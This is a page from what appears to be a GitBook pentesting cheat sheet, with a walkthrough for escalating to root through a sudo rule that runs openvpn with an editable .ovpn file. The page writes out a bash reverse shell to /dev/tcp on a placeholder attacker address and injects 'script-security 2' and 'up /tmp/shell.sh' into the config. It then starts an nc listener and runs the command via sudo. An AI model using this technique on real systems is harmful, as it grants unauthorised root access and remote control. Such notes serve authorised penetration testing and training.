Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation

Sudo OpenVPN Privilege Escalation

Sudo openvpn may be vulnerable to privilege escalation.

PreviousSudo Java Privilege EscalationNextSudo Path Traversal Privilege Escalation

Last updated 1 year ago

(root) /usr/sbin/openvpn /opt/example.ovpn
Copied!

If we can execute openvpn command as root and we have a permission of editing the .ovpn file, we can escalate to privilege.

First create a shell script to reverse shell. For example, create /tmp/shell.sh. Replace <local-ip> with your local ip address.

#!/bin/bash

bash -i >& /dev/tcp/<local-ip>/4444 0>&1
Copied!

Then change the file permission so that root can execute this script.

chmod +x /tmp/shell.sh
Copied!

Next edit the .ovpn file. We need to add "script-security 2" and "up /tmp/shell.sh" into the header.

# /opt/example.ovpn
...
script-security 2
up /tmp/shell.sh

<ca>
-----BEGIN CERTIFICATE-----
...
Copied!

In local machine, start a listener.

nc -lvnp 4444
Copied!

Now execute openvpn command as root.

sudo /usr/sbin/openvpn /opt/example.ovpn
Copied!

This command executes our shell.sh, so we should get a root shell.

Investigation
Exploitation
1. Create a Payload
2. Edit .ovpn File
3. Reverse Shell
Page cover image